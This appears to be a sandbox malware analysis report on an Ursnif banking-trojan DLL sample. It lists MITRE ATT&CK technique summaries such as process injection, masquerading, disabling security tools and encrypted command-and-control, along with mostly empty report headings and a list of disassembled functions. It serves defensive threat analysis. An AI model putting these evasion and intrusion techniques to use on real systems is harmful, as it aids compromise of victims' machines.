Opcode Fuzzy Hash: a974f24073d26aaf51d0ff5e304f1cf8e1eba465b8b00855e32e1936b68dcf84
Instruction Fuzzy Hash: CEE09233504625EB87126BA4EC48DAFBFA9FF883207044916F61493124CB31C815CF92

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report zQ32b1FVcL.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Function 00CF523C, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Function 100019C7, Relevance: 24.1, APIs: 16, Instructions: 120
threadsleepsynchronizationCOMMON

Function 00CF5DC6, Relevance: 12.1, APIs: 8, Instructions: 103
memoryCOMMON

Function 00CF9932, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Function 10001DD0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 10001812, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 00CF1D4C, Relevance: 34.7, APIs: 23, Instructions: 204
memorystringCOMMON

Function 00CF12C4, Relevance: 33.2, APIs: 22, Instructions: 248
memorystringCOMMON

Function 00CFA934, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Function 00CFAD65, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Function 00CF27F7, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Function 10001266, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 00CF65B1, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Function 100010DC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Function 00CF1000, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
sleepmemorytimeCOMMON

Function 00CF6B7B, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Function 10001CF0, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Function 100018E1, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 00CF8CE0, Relevance: 9.0, APIs: 6, Instructions: 45
networkCOMMON

Function 00CF4EE5, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Function 1000167E, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 00CF3231, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Function 00CF5C8C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Function 00CF9425, Relevance: 4.6, APIs: 3, Instructions: 77
memoryCOMMON

Function 100015BC, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON